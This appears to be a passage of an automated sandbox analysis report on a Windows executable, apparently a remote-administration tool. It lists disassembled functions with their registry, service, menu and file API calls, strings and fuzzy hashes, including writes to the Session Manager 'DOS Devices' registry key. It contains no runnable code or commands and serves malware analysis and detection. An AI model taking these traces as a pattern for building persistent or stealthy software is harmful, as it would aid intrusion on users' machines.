                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,0061A054,00000000,00020019,00000000,00000008,?), ref: 00598AFC
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,ConfigList,00000000,0061A054,00000000,0002001F,00000000,?,?), ref: 00598B3B
                                                                                          • RegCreateKeyExW.ADVAPI32 ref: 00598B6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalInitializeSectionwsprintf
                                                                                          • String ID: ConfigList$PCICTL
                                                                                          • API String ID: 3512777996-1939909508
                                                                                          • Opcode ID: 5156fd4a251a7412b98c0daf4ed20876fd819c61ee00d88501b234be6636f0e8
                                                                                          • Instruction ID: fbb0f9c70eb431d4a04cc3700702724ece547a38e4ff12e474a9b7e62e4ae24a
                                                                                          • Opcode Fuzzy Hash: 5156fd4a251a7412b98c0daf4ed20876fd819c61ee00d88501b234be6636f0e8
                                                                                          • Instruction Fuzzy Hash: 6C513FB1640305AFEB20CF54CC86FEABBE9FB49B14F148519B919DB2C1D7B4A9448B60
                                                                                          Function 005D2BC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,0002001F,?), ref: 005D2BD9
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 005D2C31
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2C50
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices, xrefs: 005D2BCF, 005D2BE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseLoadOpenStringValuewvsprintf
                                                                                          • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices
                                                                                          • API String ID: 1103474554-242128824
                                                                                          • Opcode ID: daac714671e2bdd99a74ec38173245e9475d14c1fb176618886d5a7a0013313c
                                                                                          • Instruction ID: 931ae759bdfd85df2b71bd9b083fe571fd442caf58eb1618db3004fb174551c9
                                                                                          • Opcode Fuzzy Hash: daac714671e2bdd99a74ec38173245e9475d14c1fb176618886d5a7a0013313c
                                                                                          • Instruction Fuzzy Hash: 02219536A50114BBD7309BAC9C0AFEB7BADEB48B51F08415BFD09E7251D5619E1092E0
                                                                                          Function 005D6980 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,DE64E134), ref: 005D69CC
                                                                                          • RegQueryValueExW.ADVAPI32(?,CurrentBuildNumber,00000000,?,?,?), ref: 005D6A0C
                                                                                          • RegQueryValueExW.ADVAPI32(?,ProductName,00000000,?,?,00000200), ref: 005D6A58
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D6AB0
                                                                                          Strings
                                                                                          • ProductName, xrefs: 005D6A48
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 005D69BC
                                                                                          • CurrentBuildNumber, xrefs: 005D69FC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpen
                                                                                          • String ID: CurrentBuildNumber$ProductName$Software\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 1586453840-1939540524
                                                                                          • Opcode ID: 7ecbf835e07668e1b80c7851a3b137175cdabe8742a0733a6dce69dfd9735d9e
                                                                                          • Instruction ID: 5c34e776d72b5953095cd41cd4fe76c39867d50ab9ba8e6d800de4e51683ca48
                                                                                          • Opcode Fuzzy Hash: 7ecbf835e07668e1b80c7851a3b137175cdabe8742a0733a6dce69dfd9735d9e
                                                                                          • Instruction Fuzzy Hash: 9331C57198021EAFDB20DFA4DD99FEAB778FB18304F1045DAE519A3280DB706E458F60
                                                                                          Function 005C6250 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C626D
                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 005C62CB
                                                                                          • CreatePopupMenu.USER32 ref: 005C62DA
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C6303
                                                                                          • InsertMenuItemW.USER32(?,00000000,00000001,00000030), ref: 005C6314
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C631B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$Count$CreateInfoInsertPopup
                                                                                          • String ID: 0
                                                                                          • API String ID: 756051400-4108050209
                                                                                          • Opcode ID: 745b7db022b10ca15a127ade431ba233e08df539d462de907a4b1f3b8bf4b2b4
                                                                                          • Instruction ID: d051269cda3c79bac44b0b901b326e50225b340229efe77d7203c49feed7be2a
                                                                                          • Opcode Fuzzy Hash: 745b7db022b10ca15a127ade431ba233e08df539d462de907a4b1f3b8bf4b2b4
                                                                                          • Instruction Fuzzy Hash: DA215071901218AFDB219FA4DC8DBEEBBBAFB48704F108199F509A7151DB745B84CFA0
                                                                                          Function 005B0AA9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66timewindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005B0B0C
                                                                                          • SetTimer.USER32(00000000,00000000,00000000,005B0120), ref: 005B0B28
                                                                                          • MessageBoxW.USER32(00000000,?,?,00000000), ref: 005B0B42
                                                                                          • KillTimer.USER32(00000000,00000000), ref: 005B0B4B
                                                                                          • PeekMessageW.USER32(?,00000000,00000012,00000012,00000001), ref: 005B0B60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageTimer$KillPeekwsprintf
                                                                                          • String ID: NOT copied to disk$copied to %s
                                                                                          • API String ID: 2782773723-785013881
                                                                                          • Opcode ID: ede31b108cc78780e4c2f3b225cb9969f424ba8f19d318db84391d2ed20a2650
                                                                                          • Instruction ID: 73ece10722678c4b02b2330927eec83a4a6a81d3dad4857a55f12d33806cba66
                                                                                          • Opcode Fuzzy Hash: ede31b108cc78780e4c2f3b225cb9969f424ba8f19d318db84391d2ed20a2650
                                                                                          • Instruction Fuzzy Hash: 4F110371A04204ABDB209BA0DD66FFB377AFB44701F485199FF0EA61C0E7715900CB60
                                                                                          Function 005C6AF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 005C6B03
                                                                                          • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 005C6B1D
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C6B3A
                                                                                          • GetSystemMetrics.USER32(00000031), ref: 005C6B4B
                                                                                          • LoadImageW.USER32(?,?,00000001,00000000,00000000,00000000), ref: 005C6B5F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$AddressFreeImageMetricsProcSystem
                                                                                          • String ID: LoadIconMetric$comctl32.dll
                                                                                          • API String ID: 3523791368-3710313162
                                                                                          • Opcode ID: 93e2de67d8317a36473f4d847ebdafe2c7a9915f8b080f68ef39a3c96d8aaac5
                                                                                          • Instruction ID: 0f21cd3a31b698db00466b5472ac50057582f1621e96c94f1ecc5d777ec56594
                                                                                          • Opcode Fuzzy Hash: 93e2de67d8317a36473f4d847ebdafe2c7a9915f8b080f68ef39a3c96d8aaac5
                                                                                          • Instruction Fuzzy Hash: D0019231700214BFD7109F95EC58FFE7B6EEB85B65F04405AF908D3280D6729E0086B5
                                                                                          Function 005AB030 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 005AB04E
                                                                                          • GetLastError.KERNEL32 ref: 005AB05A
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 005AB087
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005AB0AC
                                                                                          Strings
                                                                                          • OpenService failed! Error = %d , xrefs: 005AB061
                                                                                          • ControlService failed! Error = %d , xrefs: 005AB09C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseControlErrorHandleLastOpen
                                                                                          • String ID: ControlService failed! Error = %d $OpenService failed! Error = %d
                                                                                          • API String ID: 3311966420-3859893282
                                                                                          • Opcode ID: dac68fc18121599cb60c9eb42361ead250de1f358d4ac23186df1e908e2aa217
                                                                                          • Instruction ID: c5eae69912289d28e6918702a8592447d058daf5cb365021d347a56dfe639093
                                                                                          • Opcode Fuzzy Hash: dac68fc18121599cb60c9eb42361ead250de1f358d4ac23186df1e908e2aa217
                                                                                          • Instruction Fuzzy Hash: CE01D635E41119AF9F04AFB5AC1E8FF7BA9FB09301704514AFD4987241DF615A0486F1
                                                                                          Function 005AAFB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 005AAFC1
                                                                                          • GetLastError.KERNEL32 ref: 005AAFCD
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 005AAFEB
                                                                                          • GetLastError.KERNEL32 ref: 005AAFF5
                                                                                          Strings
                                                                                          • OpenService failed! Error = %d, xrefs: 005AAFD4
                                                                                          • StartService failure! Error = %d, xrefs: 005AB003
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastService$OpenStart
                                                                                          • String ID: OpenService failed! Error = %d$StartService failure! Error = %d
                                                                                          • API String ID: 3069433748-2721445038
                                                                                          • Opcode ID: 2b34d2bbbfa24a4f61f61d6cf3fe9296c62b9f5c488f9747a7de53c63900bc07
                                                                                          • Instruction ID: cc18cd7afed9052a7a31e738c6a8fc741718297d55e9f3e2790a7dd2cf0981a0
                                                                                          • Opcode Fuzzy Hash: 2b34d2bbbfa24a4f61f61d6cf3fe9296c62b9f5c488f9747a7de53c63900bc07
                                                                                          • Instruction Fuzzy Hash: 2FF02B366402357BDF242BA87C0EAEB7B5DEB09763F049012FF1CC5152D721980091F1
                                                                                          Function 005B6360 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,08000080,00000000), ref: 005B63A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 3aef9f37c4fc19f22d88f9342fc20ca507c85d7abf06bc8941268b3736ab201a
                                                                                          • Instruction ID: 314976d6d8b1841216fa43b494867013ab5b26e4f2f68dcb53e60b01ee756754
                                                                                          • Opcode Fuzzy Hash: 3aef9f37c4fc19f22d88f9342fc20ca507c85d7abf06bc8941268b3736ab201a
                                                                                          • Instruction Fuzzy Hash: 6B41A871A00605ABC724DFA8DC99BFEB7F9FF84710F14852AF546D7290DA74A900CBA1
                                                                                          Function 005C3080 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C308B
                                                                                          • GetSubMenu.USER32(?,00000000), ref: 005C30A8
                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 005C30C9
                                                                                          • GetMenuItemID.USER32(?,00000001), ref: 005C30D2
                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 005C30DC
                                                                                          • DeleteMenu.USER32(?,00000001,00000400), ref: 005C30F2
                                                                                          • GetMenuItemID.USER32(?,00000001), ref: 005C30FA
                                                                                          • DeleteMenu.USER32(?,-00000001,00000400), ref: 005C3111
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$Delete$Count
                                                                                          • String ID:
                                                                                          • API String ID: 1985338998-0
                                                                                          • Opcode ID: fa2892680ebcefbe2d915a4bb35754c717473b908797b31d7dc96522e4e587ad
                                                                                          • Instruction ID: d42f5f6cd46e90a38f3506a89750bdb42b504de9a67a1095c311bf4423344939
                                                                                          • Opcode Fuzzy Hash: fa2892680ebcefbe2d915a4bb35754c717473b908797b31d7dc96522e4e587ad
                                                                                          • Instruction Fuzzy Hash: D311A976800109BEEB119BA4DC89FFFBBBDFF85714F04801EE501A2141E7749A41CAB1
                                                                                          Function 005F26F4 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F270E
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F271B
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2728
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2735
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2742
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F275E
                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 005F276E
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2784
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecrementInterlocked
                                                                                          • String ID:
                                                                                          • API String ID: 3448037634-0
                                                                                          • Opcode ID: b0ca70a5c9aeaa77b74bc1db54593d588039d398eec869ee0f0af50e31cad647
                                                                                          • Instruction ID: df62982f41e78ab9b50e32337cd25dd4c11a69777d8611b1b52f41b4035e0bd3
                                                                                          • Opcode Fuzzy Hash: b0ca70a5c9aeaa77b74bc1db54593d588039d398eec869ee0f0af50e31cad647
                                                                                          • Instruction Fuzzy Hash: E11109B1B0121DA7DB14AB79CCC8BA6BFADFF44794F084416AA08D7140DB78F9008AB0
                                                                                          Function 005F2665 Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F2677
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F2684
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F2691
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F269E
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F26AB
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F26C7
                                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 005F26D7
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F26ED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: IncrementInterlocked
                                                                                          • String ID:
                                                                                          • API String ID: 3508698243-0
                                                                                          • Opcode ID: 61699a36c9ae1905731a2b07a07a99d7bcbf0ce197330eb4f54dd4e7f5672d6d
                                                                                          • Instruction ID: a6ae8b145c17c760e569a62954a1fd89be94794a1ecadb5d6ee298d116981b41
                                                                                          • Opcode Fuzzy Hash: 61699a36c9ae1905731a2b07a07a99d7bcbf0ce197330eb4f54dd4e7f5672d6d
                                                                                          • Instruction Fuzzy Hash: 46111BB1B0031DABDB14AFA9DC84BA6BBACBF40754F084416A608D7144CF78E950CBF5
                                                                                          Function 005D63C0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 222COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D6429
                                                                                            • Part of subcall function 005B4990: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00596384,?,00000000,752F55F0,00000010,?,00596384,80000002,?,00020019), ref: 005B49AC
                                                                                            • Part of subcall function 005B44E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 005B452B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumOpenwsprintf
                                                                                          • String ID: %s\%s$IsA()$Restore Reg, %s=%d$Restore Reg, %s=%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                          • API String ID: 934838074-744369672
                                                                                          • Opcode ID: bf9d482b229095519f25b230298dfc82fdf4b70641eda533721a055c8721e4da
                                                                                          • Instruction ID: 9dd82e6d3baaa1799c2053ebaf3722b607047f51dcdd1331bf5e87d074e0091a
                                                                                          • Opcode Fuzzy Hash: bf9d482b229095519f25b230298dfc82fdf4b70641eda533721a055c8721e4da
                                                                                          • Instruction Fuzzy Hash: D08184719006199BCB24DB58DC55BEBBBB8FF88715F04459AE909A3281FB70AF84CF50
